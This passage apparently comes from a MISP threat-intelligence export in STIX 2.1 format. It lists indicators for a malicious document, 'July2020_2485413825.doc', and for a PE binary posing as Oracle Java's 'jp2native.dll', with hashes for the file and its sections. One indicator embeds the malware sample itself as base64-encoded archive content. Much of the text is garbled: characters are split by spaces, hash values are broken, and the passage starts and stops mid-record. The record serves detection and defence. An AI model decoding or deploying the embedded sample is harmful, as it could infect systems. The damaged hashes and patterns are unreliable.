7 p E A k D v o B 6 d A O I p U l R R C D a l N C X 7 U 97 M u C / p u 82 q U 47 X c N z n s + x 4 z i 9 V z + 5 Y T N T J 7 o / 9 T 3 v 1 v C t + a 5 K m j W e W I l q 8 t d J 0 D i 2 M h P L N p s L t l 2 Z l J K I C 8 a k u x 0 i V X J g s Q 2 v t l a d 30 R h t 0 p 0 R C v D h / F v q K 4 M k v F m O S H x 4 J d T w a 3 c P c I D 8 j g t h P D b i Z x M 5 E v b A a i j I P o g y b / X V p + L V 38 n y 6 C f y t h H 4 n 7 a r n 29 f a M Z E T H z W A Z h c O T a x c H x g Z p H X G 2 s O 7 h i h w I P O T G o 2 w X 4 o u 6 w Y b k v Q l r / V n 0 V h c y V W v t M H L b K / N / w V U J v V v Y z p f / f b T h c V Y w V A K T l G w K 2 
z + b e 84 C U h g h l w 0 W 24 y T w + v 1 i N G e d 1 n n O t G Z D q A u 8 c m S l k x V 33 / B Z 7 + T X t k I O Y j O 6 O S M L g i 9 t R v w W f i Y I i d a v g A 336 B S G R d 8 y X y S w w U H a s u l 9 O g y L T / Y c g G b 8 K 8 v M L T I w 9 + 1 A y z l P V p m Y R Y W i d / W U T 8 F + N 10 l h + I g b e k C x s 3 i g t e R w 1 a v S G f + c 6 d u Y C I W W q m k l Q Y u y Q 6 e T r / q w M h + N o 7 n h U p Q L z l S L 5 u O 2 L Y c 5 p T + 1 N c J z H R f 4 h K 0 6 v Y f Y J W 9 A c t 1 H J O t C Z K Y J o K w C 55 Z 9 o w 0 t 7 g J w + 7 y k e I m u C Y f R r K b u v B E H W o + a 8 Z P M 4 s 5 X B v G 4 p 4 W Y f b s R 11 b t x c i x 9 B 2 M w W T q K Y 2 d t 12 P N O u P + 4 s s k J 6 j K o P f h F 7 i e + E N J 8 M p 5 O X g D Y V 3 K c 8 l x O 6 P a Z c i Z n 8 V l O P M r R z h G Y r E V 6 A n 2 F e l E 6 a d g J Y J Z f k S X 74 N C b b A L h + Q / r G 9 v J y k e W q D T M q + 4 J i f u o t / I O R 1 Q J y x P z + N 9 d i p 5 S v J 3 k y A l Y 37 w R b g / o c T G X Y c c c L g y d O S 1 i i c O Q / s 4 F F / l Z K 8 V q x c H w A a m Z A a d h T f O p C 6 U I z x T s e V u o 7 M z 6 F 98 S J A 11 a 7 j E l H I B k 0 W H j a 8 w l D 95 J s X B 9 / h 5 h u L 4 V V U 7 x z m r X 49 z t k C K / o //8swixj+o3NfFiEt7baoQD0BMfB05oY1hqcIgbteME21JE9m7xkKvAKV4HIuX7YtaQDtspDcrnnhL1YlE6YFqF2re9pAfJqMF5gWx++Ys3/P5STZ7xik86hk/+xUlBH0B6MnD3gDuhje8EGjcY8kw+rebv0drZikce0FPv+1XspiuMJszSaIZ+oNs3XpsNlo7v5xEUr4i00tshtKahPdiFxh2RuMghyRV9pn/H1vY+TgjU5NYHnoJkqb7oODgCPV1qQ+2ozjiIn4C2pk7tM8TukkPIsHq9OPe70+d/FryBE/rUdF80mRVu1YghI7ck1wcoA5OFu1EE2VTiRchPW3BtjuPu
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--9bb216ae-af15-4cba-9d65-40be296d9438" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T00:46:32.000Z" ,
"modified" : "2020-08-03T00:46:32.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 0 a 4 f d 937473 f d 2731569 d 1 a 39411477 e ' A N D f i l e : h a s h e s . S H A 1 = ' c f b 9390326 c 41 a c 0e81 b 0 274386 b a e 21 c 53307 b 1 ' A N D f i l e : h a s h e s . S H A 256 = ' e 3589 a a 5 d 687e58 e e 97 b d a 2 c 501 b c b a 9 d 5e942 f e 929644602 d d 1645 b 3 c 7 f 0e94 ' A N D f i l e : n a m e = ' J u l y 2020 _ 2485413825 . d o c ' A N D f i l e : s i z e = ' 623616 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A N A F A 1 F O v 6 U e F O o G A A C E C Q A g A B w A M G E 0 Z m Q 5 M z c 0 N z N m Z D I 3 M z E 1 N j l k M W E z O T Q x M T Q 3 N 2 V V V A k A A 2 h e J 19 o X i d f d X g L A A E E I Q A A A A Q h A A A A 4 L K q h O o f X 5 u N x x l 8 p 6 W W 7 U n 2 V N h 0 a t M U 1 j 0 I L m n I o G + w R v 78 p 8 L h E Z 7 J T V j K s E v Z F a N K t Q 6 Z x Q Y v M R h s W N 4 O G w j c p M d + 7 o + T V f d U 9 C A V 88 Q 1 K d c E P K H W 3 z t V m X p A z V H D h q F 2 G G L A 94 L n h R W C v b u O 2 l v H M K 2 Z T t v N e B 3 L N 7 p r C 9 / F V b s 45 p Q V j m J i l y 8 E T 1 + 439 B s F 14 b O M x A r c c z v O r N / E v 8 M S a b M S G s 4 B G H G r a Q g 9 J m C O A g b B 5 M f S j W M / m d R k I L D 2 n S b 8 Q t 42 Z + N 42 H n v g / V c 7 f t A c 2 Q k 51 M 23 M G S Z M A q 2 v j O g + B i + 4 q X Q t W S a p 44 S l t S y w z Q r c H y D z p 6 r b 0 a s 1 M R O L F g q 6 h A S 1 s d C o P o 9 L 2 g 1 M 55 K Z w S t x o k C r P 0 9 m 4E8 q b x 7 w e N P v G b 1 j f 7 G g e S Q v m K c B e T 8 L X X x a h s u U x 4 C b Z 67 J H X j z p v 4 R a Y j z w 57 f A v i F z X 1 P B 4 i m d F R W t M J / Q 4 z f C p n o M / T A T j L K m 5 H B V J F r u l k 4 l F 26 K 4 L M F S Q s E z P R Z j j S Z 1 x N q 6 W G r T A r g D p w a l 37 m p W t k 52 l O / Z l o D 5 u v k W 3 u m P 4 / B 8 j E F c / a 37 e y N P L g a M C H J G N A R P c X t v o Y y d C G L 9 g Z L v C 1 s 2 d q Y 5 W 2 d k 7 d 1 L S l A o 7 W 4 u y L C C X A / c V g 
r i P E e q O 3 n p d l s v p p 7 + L m w W 4 C 78 F 5 o q W 5 c I t V Z f N S C 98 j j Z O d P e 5 a T u 4 L W n F S m D o 9 c w u F C C i 29 I h 61 b 0 u w P Y i h E X / x 9 P t U b w M X v + i H 2 t f O X r D M P U 7 O 4 x J b + S 6 y n L 2 k 5 o 1 y 3 S 9 D F P / z v n V V V H + F h c / M w 9 E T h N E / o n 2 y r a A 84 v D W w z w 6 a O B E J x d X f 3 B i 2 c i K c H O p F / C J 26 h W B 3 + j 3 A j E 2 + f L c W 8 b x V V N + f h J w X i 9 b y q h T N 4 s l q I c L X t L O d Z e F F e P N o K Y x Y P K E Y L r I Q 4 x h y q c A 7 X M h 6 M g B d b A / L 8 s 5 R t D v v t e M + X u I v g N n O f S j N h p 7 v M F E j p D n l w 57 l W A v Q W P C D 4 C U q A z 1 c Y V A 0 b v p F m S f q Q U 1 / p p b h V W m 0 B z B g A M I P Z k y L 5 W Z o z t k E j Q N t c + H L p g W j 77 z c J 4 H z F m g q z m + D + V W J 4 V u l H y F l u N l B z S k D P C t M V 9 N B K T b k L 6 H F j r j l Z 0 0 T Y K Y U j J c R Z O 6 q F d h a M 9 Y M F 2 y z t 3 n I b r q g a / w h 8 l w a C g f U s M J n w o 1 B + x P 7 U Z v 8 m h L r 10 i T I K Y Y o 5 e u t J u + l v L D B K f U L / z e I n o P 6 + I + 5 X 15 J 9 x A w K W v p 3 r E Z c 1 n p f 140 T p l 36 d 3 T f 6 l L t F 9 V v V l R z v i t b c e L Y q z W M I 5 x 2 G w S F m P m 3 z d 9e7 k A Z J M O K I Q z O u O a J j k f V E K D r a H 4 z i V 0 i f a Y 4 A P X 5 R S P c G O a B d E b J 7 Y 8 J a p V C o 7 v u T p s d L w D C 0 b J s + Q + e x T u l R 4 U a d f g F a K n h d E t S L V 5 J q h z r 5 s V 2 g 7 W 2 r r 0 35 T U + J X A I z c n b n c x p X H 7 c t i k M n I F / n s T M b r T W A 8 / y c 25 A 6 t 2 / Q 5 U E A M 8 T 8 k k C / c Y K 2 N / s r 0 A y 9 N D d q 5 w k z j 2 j H Y P m F R 5 c E S J j k a v E J L 92 m h U / j J u H y V 5 A T c Y k Q k Q 1 Y c U + f 436 + 0 4 x x q a G 19 V D f W Q m E f r Y 1 s c p 8 g z j n b t r h 1 U L e 38 j q T s l + j x 0 + J V i 3 s 2 k F z F U d C W G R 5 T F t l N G b 8 B a f H I c D x X w o 2 A F D e j t F m K U m Q a 16 j Y F 1 f a k F 3 W I w K b l E C d K J 2E2 d S g 
h a t + / z l o g 6 M 9 d m C 0 7 d s O a f / e w w Q N 8 y P o 3 u 6 I 4 n + y d 12 / Y 6 / y Q N 9 B 6 o r s / C U c Y O O 1 w 6 F n v e 0 h y C 6 V L U j 90 X H h 2 + H F Z 33 C s I r N u o 0 C A h 90 L e 9 u C d m A 7 E M 8 f F / h P + 2 L y 0 / C N r M + E u V 122 s V 49 F h h k T E W P 4 q 6 V j H n n K 0 W n W p 8 Z C r y M H g J T p P b D T 5 u t O M E u j 8 S m i l o 3 y 4 P g l A y c 0 o T f v l t N M j G K X i b v c 82 o v 5 L 5 r 4 F U g u H 0 V U h 5729 M G / A 2 d a 0 r U w o 58 e o + j 54 B + w Q j N a A R o 8 d E t V f B G g w t U 0 r O l D W + S c + h q B G f a z G y v e r u 7 K 3 / X t Z C w I I w v 1 M x N r 8 w R 1 S 2 X V v S O p L a q J + h T s B T y O 0 4 u S + o c G O r V 8 / 2 Q p B P I 3 i / e r S z C 3 f r r g U g K k n I Q n L K f q t M 3 C z 7 l I Y u 1 R z F N k 1 F C x 69 C M b z c L z Y 5 I J n 9 Y e p R 8 t M 6 F y s A Z 3 s r 2 A F I b T W o j l 7 K j 3 X K r f X J P + 0 e I S f d 0 H n y T R r e l U W e 4 L m C L h M z Z 1 z S X U Y j 7 W w 8 f A 3 v r 0 + b 0 Q b 5 f W m a I + J o 0 G N d I 4 O D H o p U N w 570 N 3 G t X w C 7 O t e 4 O d z Z 86 f 2 D L d n W e j l N v 3 M f n Y E u k 1 k z f K o 9 G U T q b 9 K g H n n e u k a R 51 M q Z Z m 2 j F 2 R N y n 4 t 6 g 4 H 1 L z 2 / i 97 D y 1 x C c + m L B X k G P f I m D + C + F / H B 20 m s Y i 1 L 10 G 471 q 3 e O a W d T V e N h I T A b f f w J p F U B t e c L u X F p N R 13 b 5 p e 1 h L g K Q s 1 G w c Y 4 n Z X x C u A 2 O O 5 H S t m 5 k 47 k B 8 o C f o Z E u i C Q C O d 1 a 8 D k D L t B I E I V z X w L w + A m t v 2 C k f J Y Y 8 z 5 r O D 0 S W i F F o O p M a 4 a M X K c H 3 m J v 0 c Z Y W J p 2 j x d U h v J E N B B O d I R c 6 S J 64 a T Y X X T W X Z n F c 7 M F X 4 J + O l G h I T b s I a C 8 R G f c P 7 u J w D 3 T a E S m S e B R e + l n 44 J k F D a L J H 5 B h C F o j Q 0 l 71 u h P Y L + x 3 a Q b Z 8 Z 4 M 2 Y / 8 J S B W / 6 y B H 5 j W H b C / r L o 33 C z H b V v p 79 D u s Q W g y 45 i a D s j h X E v z K o 2 A B P u K 0 b a d r G P V 75 v L f f 2 + T t 
i t S 9 b F 1 N a b L j t o e F h s u Q g I f V 0 P c B U G w N s q + b 3 l 6 Y t Z g t F Z O h R H B J v p R C b y j G 0 290 s l e Y 2 I w J Q 0 J L K M w + B + c 7 s N Z h R N W z V Q m 9 R t S u t s i A b 5 H B f 28 q N s z H q V v y F d H I 0 y Y k C N J 5 v R D s g 8 Z Q Q L 8 X z T Q k r U 3 u b 1 O b a v R P O H Z Z 8 B n m 7 + z 7 Y T f h q K M 2 i W N C x d b G K 8 S y A A h Z L a v x k 5 A x r A C q / T h e c y r N G J 4 c Z 9 J O M D f M f H l U a K I Z L n x h p V 4 j d O w 0 5 V u O 6 F h n m u n I s k h I o g P N 0 E / 3 i f m 3 L 5 O C E t W S b A 4 o x 7 f E d I 7 i Y H 0 R g 8 u u m s W o l l z h L 4 P z n l Z / n L D t 78e0 h s m o K S S M C b M C v X e T Y y O D C y Q 7 V O y W h w 6 O V 0 l K x r e t h n E u p N p M r 0 M P V 6 p u g A t g S J m Y c o 1 m g Y 0 1 L T 3 u 8 d S y t J M m s c h 78 U K e A z 95 F X W t P I 81 L z H h y L Y U N I g + M P / o k o 6 O 7 y V + X M P I L g x 3 g v Q 3 g t q z s i I r + U C 689 m i N s B Z S A O P v A 0 N t i i L 5 x 9 p n I l Y 1 j T t H g m n q H F X R 2 X 36 u Z O R e 3 M w v O R G 4 j O v R S M F R v T + Y L u h L p M j i u s y + k 3 N r z i X K R x v v V T R x 9 j D 9 e m 8 M b J z o z / T 8 l h b o 8 W 26 A c S W G z e A 8 T b s d l 0 j L 5 o R u X / m A n + o g N w 4 T K x x Z J I s d L 6 S N H 4 Q s / X O Z j f R H D Y A N i x M / f R Q d v E s D q t G z w o B i O x M p z / v e x 3 H G 6 p 6 y e y 7 G h s h w H O 5 Q b G S 18 u N s Y P m k L H 1 n 4 m t + 4 X K / g Y 0 H / s L A 0 k O 9 / I 1 Z 2 g m W q e Q 3 g 27 J f I k k f r x e n i k / g t / G n s B K 8 H o Q m V L y p l N N z n Y 5 f 6 T x 43 + C Y M y C u 2 G f e 9 n S l 21 s v p l 7 B b X G X o T l + r t b M 3 T 5 c P S Q 5 U G R Z c 75 S b d o 7 N V Y y L Q h F Z q 1 O g 6 F 4 w d c 50 M y G x e u u v M Y J v Z O 7 d Q S P d c h 13 J 0 e H C j E 6 O 4 f j L Q 6 e L y D p X o c C b Y 4 Z R F 2 l D G i V A p S j q E g k f q S O Y 7 C f F Z n G g f D n K L x y R / p 9 k
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T00:46:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--aec61910-1c29-47c5-88c9-37621ded62dd" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:09:07.000Z" ,
"modified" : "2020-07-15T20:09:07.000Z" ,
"pattern" : "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451982' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-15T23:22:28+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:09:07Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"pe\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:47.000Z" ,
"modified" : "2020-08-02T18:50:47.000Z" ,
"pattern" : "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:47Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"pe\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:54.000Z" ,
"modified" : "2020-08-02T18:50:54.000Z" ,
"pattern" : "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"pe\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--0537282b-b524-441b-bc04-7b894b342a40" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:00:03.000Z" ,
"modified" : "2020-07-15T20:00:03.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdar" ,
"category" : "Other" ,
"uuid" : "3f9c0725-773e-43c0-804f-d684b03092c9"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "16384" ,
"category" : "Other" ,
"uuid" : "0b837526-f8e1-4bcd-8ecb-329f516930ae"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "6.5945206832312" ,
"category" : "Other" ,
"uuid" : "fbbaae3e-27eb-4cd8-99da-a6f55838909d"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "5963427cd562179e2c2225fa6e8bb5d5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "06c32bde-5608-47c4-a4fd-6ae4cc465b2e"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "5aea9aa2fbb76756ca7608fb2f0b50872cf9a919" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2b7f6066-6112-4600-8489-d0acf3c87394"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "0384f96cf8498309325a168041880d52e9624f023a620316a7e4ffb94a20be92" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e657a30a-27c8-466a-978b-459476309d8e"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "2d1f364720fa192a1cdd1ea3c9f5febce804f172929447f42dc66105fe9b5b65a06484dce3284bec79997ef4df3d6870aa86713d3305996bab4e7ccdd0fdbcac" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "bf8b548b-1636-44e5-a5ee-2301f3e296d8"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "192:bFGZboRzZ9QmDg//fOCVa/ott0dfwUVqFGN4W7OlKA8rof7/tpSEgxUajpiXjmIV:EB8ZvZbDdTTAf4owGI2Ee" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6c94b9e8-233a-42f8-8734-9537e202d765"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:01:15.000Z" ,
"modified" : "2020-07-15T20:01:15.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdata" ,
"category" : "Other" ,
"uuid" : "6cd4c038-ba0d-4603-ac3a-09673ea84425"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "118784" ,
"category" : "Other" ,
"uuid" : "b7f88d7f-93cc-4743-a1cd-170663465e33"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9827191322039" ,
"category" : "Other" ,
"uuid" : "61f2e657-07fc-4915-8b08-289f836cacda"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "edd63a0a668eb9c4231cdd5e0c81a044" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "401e2bf6-1ca8-4f40-acd8-9cb535d8309d"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "a1238d408a37574e5525d9b9a820398f4d7ef82a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "d7c0a094-afd8-4622-84d2-c18da9ff5c27"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "bfdb1a8c3324799ae08883d1298961f885a93ba5706f87a51f0434f847f4632a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a1cfaabe-9bd2-4246-9e10-48dd45e63dc9"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "b8d20414f732017b2274a74cab74d109ebcb9ba7fbb5280f6bb33046994f1565a4ef0b928158fbc3e86a8b49dc4f00a1c1b30c01dfc89184f7f30acec5fb222c" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7ded34a2-3ce7-41d7-832d-83a91f4eddc6"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "3072:KcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESR:f6hB5gBZ74XQN99R" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "304a3fab-c5d1-4867-97ca-0efcbab42b49"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:02:26.000Z" ,
"modified" : "2020-07-15T20:02:26.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".data" ,
"category" : "Other" ,
"uuid" : "8065b3ba-8707-4d21-b142-9ce4ca830386"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "69632" ,
"category" : "Other" ,
"uuid" : "b425d073-04ea-42b5-a609-c1e85546562d"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9479643160405" ,
"category" : "Other" ,
"uuid" : "6e7e11d3-86de-4136-bdbe-33cedbdafa36"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "6d3bca57196c0913e08a876821f385e0" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "efa13f3c-4693-4a33-b9b1-933aff8436ec"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "c67a629ab7662575eb6eac1c4e0a5daaffefdb15" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6866de3c-4f27-4faf-b4e9-2aec6ab16222"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "c5cb63c83c121d594c360584caf2a30fe7c5bed096d1abc5f9116e1e4f8113e0" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "71cb2ef1-4b3f-4c77-b912-7a78eefc8a1a"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "77143be8adb6e39cbdc21e8d9458d3fe6ffc36ebd9aa764e7b9e1e6e6e77eb6240fae09c2b321ea45dab580639b7766a1262b36499b0a75a90b81e0b55dae1ba" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "295f465b-62ea-43c6-8c60-41cf82e98820"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "1536:8lnx8E/msg8/rWJWVPRENX/HJSz+t95r49XAkr+it+a:gnxxgSrYGRQJSwrru" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "d5561dc5-6e15-4b06-9c39-5aff4909045c"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:03:50.000Z" ,
"modified" : "2020-07-15T20:03:50.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rsrc" ,
"category" : "Other" ,
"uuid" : "6bdc308a-64c9-4365-8af4-6fcecc71d572"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "27f5226b-29e3-4d36-814e-92917d4d555b"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "3.3548995614289" ,
"category" : "Other" ,
"uuid" : "fea91540-ab3a-41e2-87c5-dea257aede25"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "f3cf17707906ead98cbc9697b3b73c5f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7c8a4b53-3bb3-4324-8756-6fe35a8cc64a"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "8c280ae153325f85cd4a869f8116e9e3df0dc812" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "62471cbc-61e2-45d1-aefa-6f9d3d4c243f"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "69aff97d63b9f106ab4b318358d260968629056e693f19f01e5001d023fb1f86" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "f352baed-150a-4ff4-8745-0c274900bf0a"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "6f52b4198600889d50961a88446854ab1e7dd877c2c91f2a39a3052b4059e2ff31ae6ac9a82d5777e4fe84d18598abcd0200b1f3e4449e34b9c1d191935d57b8" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "57726d99-3ff8-4331-9c22-fb9cc3c30762"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
